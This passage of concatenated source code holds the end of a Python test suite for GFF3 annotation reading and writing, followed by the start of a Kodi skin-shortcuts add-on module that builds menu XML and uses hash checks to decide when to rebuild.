# the seq id does not exist
self.single_fp, seq_id='foo')
self.assertEqual(obs, exp)
def test_gff3_to_interval_metadata_bad(self):
with self.assertRaisesRegex(GFF3FormatError,
r'do not have 9 columns in this line'):
_gff3_to_interval_metadata(
get_data_path('gff3_bad_wrong_columns'),
seq_id='Chromosome')
def test_gff3_to_generator(self):
exps = [('Chromosome', self.imd1),
('gi|556503834|ref|NC_000913.3|', self.imd2)]
obss = _gff3_to_generator(self.multi_fp)
for obs, exp in zip(obss, exps):
self.assertEqual(obs, exp)
def test_gff3_to_generator_empty(self):
empty_fps = map(get_data_path, ['empty', 'whitespace_only'])
for empty_fp in empty_fps:
obs = list(_gff3_to_generator(empty_fp))
self.assertEqual(obs, [])
def test_gff3_to_sequence(self):
obs = _gff3_to_sequence(self.seq_fp)
self.assertEqual(obs, self.seq)
def test_gff3_to_dna(self):
obs = _gff3_to_dna(self.seq_fp)
self.assertEqual(obs, self.dna)
class WriterTests(GFF3IOTests):
def test_interval_metadata_to_gff3(self):
with io.StringIO() as fh:
_interval_metadata_to_gff3(self.imd1, fh, seq_id='Chromosome')
# only compare the uncommented lines because the comments are not
# stored in IntervalMetadata
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
with open(self.single_fp) as f:
exp = [i.rstrip() for i in f.readlines() if not i.startswith('#')]
self.assertEqual(obs, exp)
def test_interval_metadata_to_gff3_missing_field(self):
exp = 'ctg123\t.\tgene\t1\t9\t.\t.\t.\tID=gene00001;Name=EDEN'
imd = IntervalMetadata(9)
imd.add([(0, 9)], metadata={
'type': 'gene', 'ID': 'gene00001', 'Name': 'EDEN'})
with io.StringIO() as fh:
_interval_metadata_to_gff3(imd, fh, seq_id='ctg123')
# only compare the uncommented lines because the comments are not
# stored in IntervalMetadata
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
self.assertEqual([exp], obs)
def test_interval_metadata_to_gff3_escape(self):
# test escape of reserved char in GFF3
exp = 'ctg123\t.\tgene\t1\t9\t.\t.\t.\tID=a%3B%3D%26%2Cb'
imd = IntervalMetadata(9)
imd.add([(0, 9)], metadata={
'type': 'gene', 'ID': 'a;=&,b'})
with io.StringIO() as fh:
_interval_metadata_to_gff3(imd, fh, seq_id='ctg123')
# only compare the uncommented lines because the comments are not
# stored in IntervalMetadata
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
self.assertEqual([exp], obs)
def test_interval_metadata_to_gff3_multiple_values(self):
# test multiple values of db_xref are correctly serialized
exp = 'ctg123\t.\tgene\t1\t9\t.\t.\t.\tDbxref=GO:000152,GO:001234'
imd = IntervalMetadata(9)
imd.add([(0, 9)], metadata={
'type': 'gene', 'db_xref': ['GO:000152', 'GO:001234']})
with io.StringIO() as fh:
_interval_metadata_to_gff3(imd, fh, seq_id='ctg123')
# only compare the uncommented lines because the comments are not
# stored in IntervalMetadata
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
self.assertEqual([exp], obs)
def test_interval_metadata_to_gff3_empty(self):
imd = IntervalMetadata(None)
with io.StringIO() as fh:
_interval_metadata_to_gff3(imd, fh, seq_id='foo')
obs = fh.getvalue()
self.assertEqual(obs, '##gff-version 3\n')
def test_interval_metadata_to_gff3_sub_region(self):
seq_id = 'NC 7'
with open(self.multi_fp) as f:
exp = [i.strip() for i in f if i.startswith(seq_id)]
with io.StringIO() as fh:
_serialize_interval_metadata(
self.imd3, seq_id=seq_id, fh=fh, skip_subregion=False)
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
self.assertEqual(exp, obs)
with io.StringIO() as fh:
_serialize_interval_metadata(self.imd3, seq_id=seq_id, fh=fh)
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
# all the rest lines except the 1st are sub-region lines, so only
# compare the first line from exp
self.assertEqual(exp[:1], obs)
def test_sequence_to_gff3(self):
with io.StringIO() as fh:
_sequence_to_gff3(self.seq, fh)
obs = fh.getvalue()
with open(self.seq_fp) as fh:
exp = fh.read()
self.assertEqual(exp, obs)
def test_dna_to_gff3(self):
with io.StringIO() as fh:
_dna_to_gff3(self.dna, fh)
obs = fh.getvalue()
with open(self.seq_fp) as fh:
exp = fh.read()
self.assertEqual(exp, obs)
def test_raise_subregion(self):
im = IntervalMetadata(None)
im.add([(0, 3), (7, 9)], metadata={'type': 'gene'})
with io.StringIO() as fh:
with self.assertRaises(GFF3FormatError):
_serialize_interval_metadata(
im, seq_id='a', fh=fh, skip_subregion=False)
class RoundtripTests(GFF3IOTests):
def test_roundtrip_interval_metadata(self):
''''''
with io.StringIO() as fh:
_interval_metadata_to_gff3(
_gff3_to_interval_metadata(
self.single_fp,
seq_id='Chromosome'),
fh,
seq_id='Chromosome')
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
with open(self.single_fp) as f:
exp = [i.rstrip() for i in f.readlines() if not i.startswith('#')]
self.assertEqual(obs, exp)
def test_roundtrip_interval_metadata_generator(self):
with io.StringIO() as fh:
_generator_to_gff3(
_gff3_to_generator(self.multi_fp), fh, skip_subregion=False)
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
with open(self.multi_fp) as f:
exp = [i.rstrip() for i in f.readlines() if not i.startswith('#')]
self.assertEqual(obs, exp)
if __name__ == '__main__':
main()
| bsd-3-clause |
AMOboxTV/AMOBox.LegoBuild | script.skinshortcuts/resources/lib/xmlfunctions.py | 1 | 51495 | # coding=utf-8
import os, sys, datetime, unicodedata, re
import xbmc, xbmcgui, xbmcvfs, xbmcaddon
import xml.etree.ElementTree as xmltree
from xml.sax.saxutils import escape as escapeXML
import ast
from traceback import print_exc
from unicodeutils import try_decode
if sys.version_info < (2, 7):
import simplejson
else:
import json as simplejson
__addon__ = xbmcaddon.Addon()
__addonid__ = sys.modules[ "__main__" ].__addonid__
__addonversion__ = __addon__.getAddonInfo('version')
__xbmcversion__ = xbmc.getInfoLabel( "System.BuildVersion" ).split(".")[0]
__datapath__ = os.path.join( xbmc.translatePath( "special://profile/addon_data/" ).decode('utf-8'), __addonid__ ).encode('utf-8')
__masterpath__ = os.path.join( xbmc.translatePath( "special://masterprofile/addon_data/" ).decode('utf-8'), __addonid__ ).encode('utf-8')
__skin__ = xbmc.translatePath( "special://skin/" )
__language__ = __addon__.getLocalizedString
import datafunctions, template
DATA = datafunctions.DataFunctions()
import hashlib, hashlist
def log(txt):
if __addon__.getSetting( "enable_logging" ) == "true":
if isinstance (txt,str):
txt = txt.decode('utf-8')
message = u'%s: %s' % (__addonid__, txt)
xbmc.log(msg=message.encode('utf-8'), level=xbmc.LOGDEBUG)
class XMLFunctions():
def __init__(self):
self.MAINWIDGET = {}
self.MAINBACKGROUND = {}
self.MAINPROPERTIES = {}
self.hasSettings = False
self.widgetCount = 1
self.loadedPropertyPatterns = False
self.propertyPatterns = None
self.skinDir = xbmc.translatePath( "special://skin" )
        self.checkForShortcuts = []
def buildMenu( self, mainmenuID, groups, numLevels, buildMode, options, minitems, weEnabledSystemDebug = False, weEnabledScriptDebug = False ):
# Entry point for building includes.xml files
if xbmcgui.Window( 10000 ).getProperty( "skinshortcuts-isrunning" ) == "True":
return
xbmcgui.Window( 10000 ).setProperty( "skinshortcuts-isrunning", "True" )
# Get a list of profiles
fav_file = xbmc.translatePath( 'special://userdata/profiles.xml' ).decode("utf-8")
tree = None
if xbmcvfs.exists( fav_file ):
f = xbmcvfs.File( fav_file )
tree = xmltree.fromstring( f.read() )
profilelist = []
if tree is not None:
profiles = tree.findall( "profile" )
for profile in profiles:
name = profile.find( "name" ).text.encode( "utf-8" )
dir = profile.find( "directory" ).text.encode( "utf-8" )
log( "Profile found: " + name + " (" + dir + ")" )
# Localise the directory
if "://" in dir:
dir = xbmc.translatePath( dir ).decode( "utf-8" )
else:
                    # Base it off of the master profile
dir = xbmc.translatePath( os.path.join( "special://masterprofile", dir ) ).decode( "utf-8" )
profilelist.append( [ dir, "StringCompare(System.ProfileName," + name.decode( "utf-8" ) + ")", name.decode( "utf-8" ) ] )
else:
profilelist = [["special://masterprofile", None]]
if self.shouldwerun( profilelist ) == False:
log( "Menu is up to date" )
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-isrunning" )
return
progress = None
# Create a progress dialog
progress = xbmcgui.DialogProgressBG()
progress.create(__addon__.getAddonInfo( "name" ), __language__( 32049 ) )
progress.update( 0 )
# Write the menus
try:
self.writexml( profilelist, mainmenuID, groups, numLevels, buildMode, progress, options, minitems )
complete = True
except:
log( "Failed to write menu" )
print_exc()
complete = False
# Mark that we're no longer running, clear the progress dialog
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-isrunning" )
progress.close()
if complete == True:
# Menu is built, reload the skin
xbmc.executebuiltin( "XBMC.ReloadSkin()" )
else:
# Menu couldn't be built - generate a debug log
# If we enabled debug logging
if weEnabledSystemDebug or weEnabledScriptDebug:
# Disable any logging we enabled
if weEnabledSystemDebug:
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method":"Settings.setSettingValue", "params": {"setting":"debug.showloginfo", "value":false} } ' )
if weEnabledScriptDebug:
__addon__.setSetting( "enable_logging", "false" )
# Offer to upload a debug log
if xbmc.getCondVisibility( "System.HasAddon( script.xbmc.debug.log )" ):
ret = xbmcgui.Dialog().yesno( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32093 ) )
if ret:
xbmc.executebuiltin( "RunScript(script.xbmc.debug.log)" )
else:
xbmcgui.Dialog().ok( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32094 ) )
else:
# Enable any debug logging needed
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method": "Settings.getSettings" }')
json_query = unicode(json_query, 'utf-8', errors='ignore')
json_response = simplejson.loads(json_query)
enabledSystemDebug = False
enabledScriptDebug = False
if json_response.has_key('result') and json_response['result'].has_key('settings') and json_response['result']['settings'] is not None:
for item in json_response['result']['settings']:
if item["id"] == "debug.showloginfo":
if item["value"] == False:
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method":"Settings.setSettingValue", "params": {"setting":"debug.showloginfo", "value":true} } ' )
enabledSystemDebug = True
if __addon__.getSetting( "enable_logging" ) != "true":
__addon__.setSetting( "enable_logging", "true" )
enabledScriptDebug = True
if enabledSystemDebug or enabledScriptDebug:
# We enabled one or more of the debug options, re-run this function
self.buildMenu( mainmenuID, groups, numLevels, buildMode, options, minitems, enabledSystemDebug, enabledScriptDebug )
else:
# Offer to upload a debug log
if xbmc.getCondVisibility( "System.HasAddon( script.xbmc.debug.log )" ):
ret = xbmcgui.Dialog().yesno( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32093 ) )
if ret:
xbmc.executebuiltin( "RunScript(script.xbmc.debug.log)" )
else:
xbmcgui.Dialog().ok( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32094 ) )
def shouldwerun( self, profilelist ):
try:
property = xbmcgui.Window( 10000 ).getProperty( "skinshortcuts-reloadmainmenu" )
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-reloadmainmenu" )
if property == "True":
log( "Menu has been edited")
return True
except:
pass
# Save some settings to skin strings
xbmc.executebuiltin( "Skin.SetString(skinshortcuts-sharedmenu,%s)" %( __addon__.getSetting( "shared_menu" ) ) )
# Get the skins addon.xml file
addonpath = xbmc.translatePath( os.path.join( "special://skin/", 'addon.xml').encode("utf-8") ).decode("utf-8")
addon = xmltree.parse( addonpath )
extensionpoints = addon.findall( "extension" )
paths = []
skinpaths = []
# Get the skin version
skinVersion = addon.getroot().attrib.get( "version" )
# Get the directories for resolutions this skin supports
for extensionpoint in extensionpoints:
if extensionpoint.attrib.get( "point" ) == "xbmc.gui.skin":
resolutions = extensionpoint.findall( "res" )
for resolution in resolutions:
path = xbmc.translatePath( os.path.join( "special://skin/", resolution.attrib.get( "folder" ), "script-skinshortcuts-includes.xml").encode("utf-8") ).decode("utf-8")
paths.append( path )
skinpaths.append( path )
# Check for the includes file
for path in paths:
if not xbmcvfs.exists( path ):
log( "Includes file does not exist" )
return True
else:
pass
try:
hashes = ast.literal_eval( xbmcvfs.File( os.path.join( __masterpath__ , xbmc.getSkinDir() + ".hash" ) ).read() )
except:
# There is no hash list, return True
log( "No hash list" )
print_exc()
return True
checkedXBMCVer = False
checkedSkinVer = False
checkedScriptVer = False
checkedProfileList = False
checkedPVRVis = False
checkedSharedMenu = False
foundFullMenu = False
for hash in hashes:
if hash[1] is not None:
if hash[0] == "::XBMCVER::":
# Check the skin version is still the same as hash[1]
checkedXBMCVer = True
if __xbmcversion__ != hash[1]:
log( "Now running a different version of Kodi" )
return True
elif hash[0] == "::SKINVER::":
# Check the skin version is still the same as hash[1]
checkedSkinVer = True
if skinVersion != hash[1]:
log( "Now running a different skin version" )
return True
elif hash[0] == "::SCRIPTVER::":
# Check the script version is still the same as hash[1]
checkedScriptVer = True
if __addonversion__ != hash[1]:
log( "Now running a different script version" )
return True
elif hash[0] == "::PROFILELIST::":
# Check the profilelist is still the same as hash[1]
checkedProfileList = True
if profilelist != hash[1]:
log( "Profiles have changes" )
return True
elif hash[0] == "::HIDEPVR::":
checkedPVRVis = True
if __addon__.getSetting( "donthidepvr" ) != hash[1]:
log( "PVR visibility setting has changed" )
elif hash[0] == "::SHARED::":
# Check whether shared-menu setting has changed
checkedSharedMenu = True
if __addon__.getSetting( "shared_menu" ) != hash[1]:
log( "Shared menu setting has changed" )
return True
elif hash[0] == "::LANGUAGE::":
# We no longer need to rebuild on a system language change
pass
elif hash[0] == "::SKINBOOL::":
# A boolean we need to set (if profile matches)
if xbmc.getCondVisibility( hash[ 1 ][ 0 ] ):
if hash[ 1 ][ 2 ] == "True":
xbmc.executebuiltin( "Skin.SetBool(%s)" %( hash[ 1 ][ 1 ] ) )
else:
xbmc.executebuiltin( "Skin.Reset(%s)" %( hash[ 1 ][ 1 ] ) )
elif hash[0] == "::FULLMENU::":
# Mark that we need to set the fullmenu bool
foundFullMenu = True
elif hash[0] == "::SKINDIR::":
# Used to import menus from one skin to another, nothing to check here
pass
else:
try:
hasher = hashlib.md5()
hasher.update( xbmcvfs.File( hash[0] ).read() )
if hasher.hexdigest() != hash[1]:
log( "Hash does not match on file " + hash[0] )
log( "(" + hash[1] + " > " + hasher.hexdigest() + ")" )
return True
except:
log( "Unable to generate hash for %s" %( hash[ 0 ] ) )
log( "(%s > ?)" %( hash[ 1 ] ) )
else:
if xbmcvfs.exists( hash[0] ):
log( "File now exists " + hash[0] )
return True
# Set or clear the FullMenu skin bool
if foundFullMenu:
xbmc.executebuiltin( "Skin.SetBool(SkinShortcuts-FullMenu)" )
else:
xbmc.executebuiltin( "Skin.Reset(SkinShortcuts-FullMenu)" )
# If the skin or script version, or profile list, haven't been checked, we need to rebuild the menu
# (most likely we're running an old version of the script)
if checkedXBMCVer == False or checkedSkinVer == False or checkedScriptVer == False or checkedProfileList == False or checkedPVRVis == False or checkedSharedMenu == False:
return True
# If we get here, the menu does not need to be rebuilt.
return False
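    # Hedged note (not from the original add-on): the per-file check above is a
    # plain md5 of each tracked file's contents:
    #   hasher = hashlib.md5()
    #   hasher.update(xbmcvfs.File(path).read())
    #   rebuild_needed = hasher.hexdigest() != stored_hash
    # Any mismatch, or a tracked file newly appearing, forces writexml() to
    # regenerate script-skinshortcuts-includes.xml.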
def writexml( self, profilelist, mainmenuID, groups, numLevels, buildMode, progress, options, minitems ):
# Reset the hashlist, add the profile list and script version
hashlist.list = []
hashlist.list.append( ["::PROFILELIST::", profilelist] )
hashlist.list.append( ["::SCRIPTVER::", __addonversion__] )
hashlist.list.append( ["::XBMCVER::", __xbmcversion__] )
hashlist.list.append( ["::HIDEPVR::", __addon__.getSetting( "donthidepvr" )] )
hashlist.list.append( ["::SHARED::", __addon__.getSetting( "shared_menu" )] )
hashlist.list.append( ["::SKINDIR::", xbmc.getSkinDir()] )
# Clear any skin settings for backgrounds and widgets
DATA._reset_backgroundandwidgets()
self.widgetCount = 1
# Create a new tree and includes for the various groups
tree = xmltree.ElementTree( xmltree.Element( "includes" ) )
root = tree.getroot()
# Create a Template object and pass it the root
Template = template.Template()
Template.includes = root
Template.progress = progress
# Get any shortcuts we're checking for
self.checkForShortcuts = []
overridestree = DATA._get_overrides_skin()
checkForShorctcutsOverrides = overridestree.getroot().findall( "checkforshortcut" )
for checkForShortcutOverride in checkForShorctcutsOverrides:
if "property" in checkForShortcutOverride.attrib:
# Add this to the list of shortcuts we'll check for
self.checkForShortcuts.append( ( checkForShortcutOverride.text.lower(), checkForShortcutOverride.attrib.get( "property" ), "False" ) )
mainmenuTree = xmltree.SubElement( root, "include" )
mainmenuTree.set( "name", "skinshortcuts-mainmenu" )
submenuTrees = []
for level in range( 0, int( numLevels) + 1 ):
subelement = xmltree.SubElement(root, "include")
subtree = xmltree.SubElement( root, "include" )
if level == 0:
subtree.set( "name", "skinshortcuts-submenu" )
else:
subtree.set( "name", "skinshortcuts-submenu-" + str( level ) )
if subtree not in submenuTrees:
submenuTrees.append( subtree )
if buildMode == "single":
allmenuTree = xmltree.SubElement( root, "include" )
allmenuTree.set( "name", "skinshortcuts-allmenus" )
profilePercent = 100 / len( profilelist )
profileCount = -1
submenuNodes = {}
for profile in profilelist:
log( "Building menu for profile %s" %( profile[ 2 ] ) )
# Load profile details
profileDir = profile[0]
profileVis = profile[1]
profileCount += 1
# Reset whether we have settings
self.hasSettings = False
# Reset any checkForShortcuts to say we haven't found them
newCheckForShortcuts = []
for checkforShortcut in self.checkForShortcuts:
newCheckForShortcuts.append( ( checkforShortcut[ 0 ], checkforShortcut[ 1 ], "False" ) )
self.checkForShortcuts = newCheckForShortcuts
# Clear any previous labelIDs
DATA._clear_labelID()
# Clear any additional properties, which may be for a different profile
DATA.currentProperties = None
# Create objects to hold the items
menuitems = []
templateMainMenuItems = xmltree.Element( "includes" )
# If building the main menu, split the mainmenu shortcut nodes into the menuitems list
fullMenu = False
if groups == "" or groups.split( "|" )[0] == "mainmenu":
# Set a skinstring that marks that we're providing the whole menu
xbmc.executebuiltin( "Skin.SetBool(SkinShortcuts-FullMenu)" )
hashlist.list.append( ["::FULLMENU::", "True"] )
for node in DATA._get_shortcuts( "mainmenu", None, True, profile[0] ).findall( "shortcut" ):
menuitems.append( node )
fullMenu = True
else:
# Clear any skinstring marking that we're providing the whole menu
xbmc.executebuiltin( "Skin.Reset(SkinShortcuts-FullMenu)" )
hashlist.list.append( ["::FULLMENU::", "False"] )
# If building specific groups, split them into the menuitems list
count = 0
if groups != "":
for group in groups.split( "|" ):
if count != 0 or group != "mainmenu":
menuitems.append( group )
if len( menuitems ) == 0:
# No groups to build
break
itemidmainmenu = 0
if len( Template.otherTemplates ) == 0:
percent = profilePercent / len( menuitems )
else:
percent = float( profilePercent ) / float( len( menuitems ) * 2 )
Template.percent = percent * ( len( menuitems ) )
i = 0
for item in menuitems:
i += 1
itemidmainmenu += 1
currentProgress = ( profilePercent * profileCount ) + ( percent * i )
progress.update( int( currentProgress ) )
Template.current = currentProgress
submenuDefaultID = None
if not isinstance( item, basestring ):
# This is a main menu item (we know this because it's an element, not a string)
submenu = item.find( "labelID" ).text
# Build the menu item
menuitem, allProps = self.buildElement( item, "mainmenu", None, profile[1], DATA.slugify( submenu, convertInteger=True ), itemid = itemidmainmenu, options = options )
# Save a copy for the template
templateMainMenuItems.append( Template.copy_tree( menuitem ) )
# Get submenu defaultID
submenuDefaultID = item.find( "defaultID" ).text
# Remove any template-only properties
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
for key in otherProperties:
if key in allProps.keys() and key in templateOnly:
# This key is template-only
menuitem.remove( allProps[ key ] )
allProps.pop( key )
# Add the menu item to the various includes, retaining a reference to them
mainmenuItemA = Template.copy_tree( menuitem )
mainmenuTree.append( mainmenuItemA )
if buildMode == "single":
mainmenuItemB = Template.copy_tree( menuitem )
allmenuTree.append( mainmenuItemB )
else:
# It's an additional menu, so get its labelID
submenu = DATA._get_labelID( item, None )
# Build the submenu
count = 0 # Used to keep track of additional submenu
for submenuTree in submenuTrees:
submenuVisibilityName = submenu
if count == 1:
submenu = submenu + "." + str( count )
elif count != 0:
submenu = submenu[:-1] + str( count )
submenuVisibilityName = submenu[:-2]
# Get the trees we're going to write the menu to
if submenu in submenuNodes:
justmenuTreeA = submenuNodes[ submenu ][ 0 ]
justmenuTreeB = submenuNodes[ submenu ][ 1 ]
else:
# Create these nodes
justmenuTreeA = xmltree.SubElement( root, "include" )
justmenuTreeB = xmltree.SubElement( root, "include" )
justmenuTreeA.set( "name", "skinshortcuts-group-" + DATA.slugify( submenu ) )
justmenuTreeB.set( "name", "skinshortcuts-group-alt-" + DATA.slugify( submenu ) )
submenuNodes[ submenu ] = [ justmenuTreeA, justmenuTreeB ]
itemidsubmenu = 0
# Get the shortcuts for the submenu
if count == 0:
submenudata = DATA._get_shortcuts( submenu, submenuDefaultID, True, profile[0] )
else:
submenudata = DATA._get_shortcuts( submenu, None, True, profile[0] )
if isinstance( submenudata, list ):
submenuitems = submenudata
else:
submenuitems = submenudata.findall( "shortcut" )
# Are there any submenu items for the main menu?
if count == 0:
if len( submenuitems ) != 0:
try:
hasSubMenu = xmltree.SubElement( mainmenuItemA, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "True"
if buildMode == "single":
hasSubMenu = xmltree.SubElement( mainmenuItemB, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "True"
except:
# There probably isn't a main menu
pass
else:
try:
hasSubMenu = xmltree.SubElement( mainmenuItemA, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "False"
if buildMode == "single":
hasSubMenu = xmltree.SubElement( mainmenuItemB, "property" )
hasSubMenu.set( "name", "hasSubmenu" )
hasSubMenu.text = "False"
except:
# There probably isn't a main menu
pass
# If we're building a single menu, update the onclicks of the main menu
if buildMode == "single" and not len( submenuitems ) == 0:
for onclickelement in mainmenuItemB.findall( "onclick" ):
if "condition" in onclickelement.attrib:
onclickelement.set( "condition", "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ") + [" + onclickelement.attrib.get( "condition" ) + "]" )
newonclick = xmltree.SubElement( mainmenuItemB, "onclick" )
newonclick.text = "SetProperty(submenuVisibility," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ",10000)"
newonclick.set( "condition", onclickelement.attrib.get( "condition" ) )
else:
onclickelement.set( "condition", "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
newonclick = xmltree.SubElement( mainmenuItemB, "onclick" )
newonclick.text = "SetProperty(submenuVisibility," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ",10000)"
# Build the submenu items
templateSubMenuItems = xmltree.Element( "includes" )
for submenuItem in submenuitems:
itemidsubmenu += 1
# Build the item without any visibility conditions
menuitem, allProps = self.buildElement( submenuItem, submenu, None, profile[1], itemid = itemidsubmenu, options = options )
isSubMenuElement = xmltree.SubElement( menuitem, "property" )
isSubMenuElement.set( "name", "isSubmenu" )
isSubMenuElement.text = "True"
# Save a copy for the template
templateSubMenuItems.append( Template.copy_tree( menuitem ) )
# Remove any template-only properties
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
for key in otherProperties:
if key in allProps.keys() and key in templateOnly:
# This key is template-only
menuitem.remove( allProps[ key ] )
allProps.pop( key )
# Add it, with appropriate visibility conditions, to the various submenu includes
justmenuTreeA.append( menuitem )
menuitemCopy = Template.copy_tree( menuitem )
visibilityElement = menuitemCopy.find( "visible" )
visibilityElement.text = "[%s] + %s" %( visibilityElement.text, "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
justmenuTreeB.append( menuitemCopy )
if buildMode == "single":
# Add the property 'submenuVisibility'
allmenuTreeCopy = Template.copy_tree( menuitemCopy )
submenuVisibility = xmltree.SubElement( allmenuTreeCopy, "property" )
submenuVisibility.set( "name", "submenuVisibility" )
submenuVisibility.text = DATA.slugify( submenuVisibilityName, convertInteger=True )
allmenuTree.append( allmenuTreeCopy )
menuitemCopy = Template.copy_tree( menuitem )
visibilityElement = menuitemCopy.find( "visible" )
visibilityElement.text = "[%s] + %s" %( visibilityElement.text, "StringCompare(Container(" + mainmenuID + ").ListItem.Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
submenuTree.append( menuitemCopy )
# Build the template for the submenu
Template.parseItems( "submenu", count, templateSubMenuItems, profile[ 2 ], profile[ 1 ], "StringCompare(Container(" + mainmenuID + ").ListItem.Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")", item )
count += 1
if not self.hasSettings:
# Check whether the overrides ask for a forced settings item...
overridestree = DATA._get_overrides_skin()
forceSettings = overridestree.getroot().find( "forcesettings" )
if forceSettings is not None:
# We want a settings option to be added
newelement = xmltree.SubElement( mainmenuTree, "item" )
xmltree.SubElement( newelement, "label" ).text = "$LOCALIZE[10004]"
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
xmltree.SubElement( newelement, "onclick" ).text = "ActivateWindow(settings)"
xmltree.SubElement( newelement, "visible" ).text = profile[1]
if buildMode == "single":
newelement = xmltree.SubElement( mainmenuTree, "item" )
xmltree.SubElement( newelement, "label" ).text = "$LOCALIZE[10004]"
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
xmltree.SubElement( newelement, "onclick" ).text = "ActivateWindow(settings)"
xmltree.SubElement( newelement, "visible" ).text = profile[1]
if len( self.checkForShortcuts ) != 0:
# Add a value to the variable for all checkForShortcuts
for checkForShortcut in self.checkForShortcuts:
if profile[ 1 ] is not None and xbmc.getCondVisibility( profile[ 1 ] ):
# Current profile - set the skin bool
if checkForShortcut[ 2 ] == "True":
xbmc.executebuiltin( "Skin.SetBool(%s)" %( checkForShortcut[ 1 ] ) )
else:
xbmc.executebuiltin( "Skin.Reset(%s)" %( checkForShortcut[ 1 ] ) )
# Save this to the hashes file, so we can set it on profile changes
hashlist.list.append( [ "::SKINBOOL::", [ profile[ 1 ], checkForShortcut[ 1 ], checkForShortcut[ 2 ] ] ] )
# Build the template for the main menu
Template.parseItems( "mainmenu", 0, templateMainMenuItems, profile[ 2 ], profile[ 1 ], "", "", mainmenuID )
# If we haven't built enough main menu items, copy the ones we have
while itemidmainmenu < minitems and fullMenu and len( mainmenuTree ) != 0:
updatedMenuTree = Template.copy_tree( mainmenuTree )
for item in updatedMenuTree:
itemidmainmenu += 1
# Update ID
item.set( "id", str( itemidmainmenu ) )
for idElement in item.findall( "property" ):
if idElement.attrib.get( "name" ) == "id":
idElement.text = "$NUM[%s]" %( str( itemidmainmenu ) )
mainmenuTree.append( item )
# Build any 'Other' templates
Template.writeOthers()
progress.update( 100, message = __language__( 32098 ) )
# Get the skins addon.xml file
addonpath = xbmc.translatePath( os.path.join( "special://skin/", 'addon.xml').encode("utf-8") ).decode("utf-8")
addon = xmltree.parse( addonpath )
extensionpoints = addon.findall( "extension" )
paths = []
for extensionpoint in extensionpoints:
if extensionpoint.attrib.get( "point" ) == "xbmc.gui.skin":
resolutions = extensionpoint.findall( "res" )
for resolution in resolutions:
path = xbmc.translatePath( os.path.join( try_decode( self.skinDir ) , try_decode( resolution.attrib.get( "folder" ) ), "script-skinshortcuts-includes.xml").encode("utf-8") ).decode('utf-8')
paths.append( path )
skinVersion = addon.getroot().attrib.get( "version" )
# Save the tree
DATA.indent( tree.getroot() )
for path in paths:
tree.write( path, encoding="UTF-8" )
# Save the hash of the file we've just written
with open(path, "r+") as f:
DATA._save_hash( path, f.read() )
f.close()
# Append the skin version to the hashlist
hashlist.list.append( ["::SKINVER::", skinVersion] )
# Save the hashes
file = xbmcvfs.File( os.path.join( __masterpath__ , xbmc.getSkinDir() + ".hash" ), "w" )
file.write( repr( hashlist.list ) )
file.close()
def buildElement( self, item, groupName, visibilityCondition, profileVisibility, submenuVisibility = None, itemid=-1, options=[] ):
# Build an <item> element for the passed shortcut and return it, along with a dict of the properties that were added
newelement = xmltree.Element( "item" )
allProps = {}
# Set ID
if itemid != -1:
newelement.set( "id", str( itemid ) )
idproperty = xmltree.SubElement( newelement, "property" )
idproperty.set( "name", "id" )
idproperty.text = "$NUM[%s]" %( str( itemid ) )
allProps[ "id" ] = idproperty
# Label and label2
xmltree.SubElement( newelement, "label" ).text = DATA.local( item.find( "label" ).text )[1]
xmltree.SubElement( newelement, "label2" ).text = DATA.local( item.find( "label2" ).text )[1]
# Icon and thumb
icon = item.find( "override-icon" )
if icon is None:
icon = item.find( "icon" )
if icon is None:
xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
else:
xmltree.SubElement( newelement, "icon" ).text = try_decode( icon.text )
thumb = item.find( "thumb" )
if thumb is not None:
xmltree.SubElement( newelement, "thumb" ).text = try_decode( item.find( "thumb" ).text )
# labelID and defaultID
labelID = xmltree.SubElement( newelement, "property" )
labelID.text = item.find( "labelID" ).text
labelID.set( "name", "labelID" )
allProps[ "labelID" ] = labelID
defaultID = xmltree.SubElement( newelement, "property" )
defaultID.text = item.find( "defaultID" ).text
defaultID.set( "name", "defaultID" )
allProps[ "defaultID" ] = defaultID
# Clear cloned options if main menu
if groupName == "mainmenu":
self.MAINWIDGET = {}
self.MAINBACKGROUND = {}
self.MAINPROPERTIES = {}
# Get fallback custom properties
foundProperties = []
# Additional properties
properties = eval( item.find( "additional-properties" ).text )
if len( properties ) != 0:
for property in properties:
if property[0] == "node.visible":
visibleProperty = xmltree.SubElement( newelement, "visible" )
visibleProperty.text = try_decode( property[1] )
else:
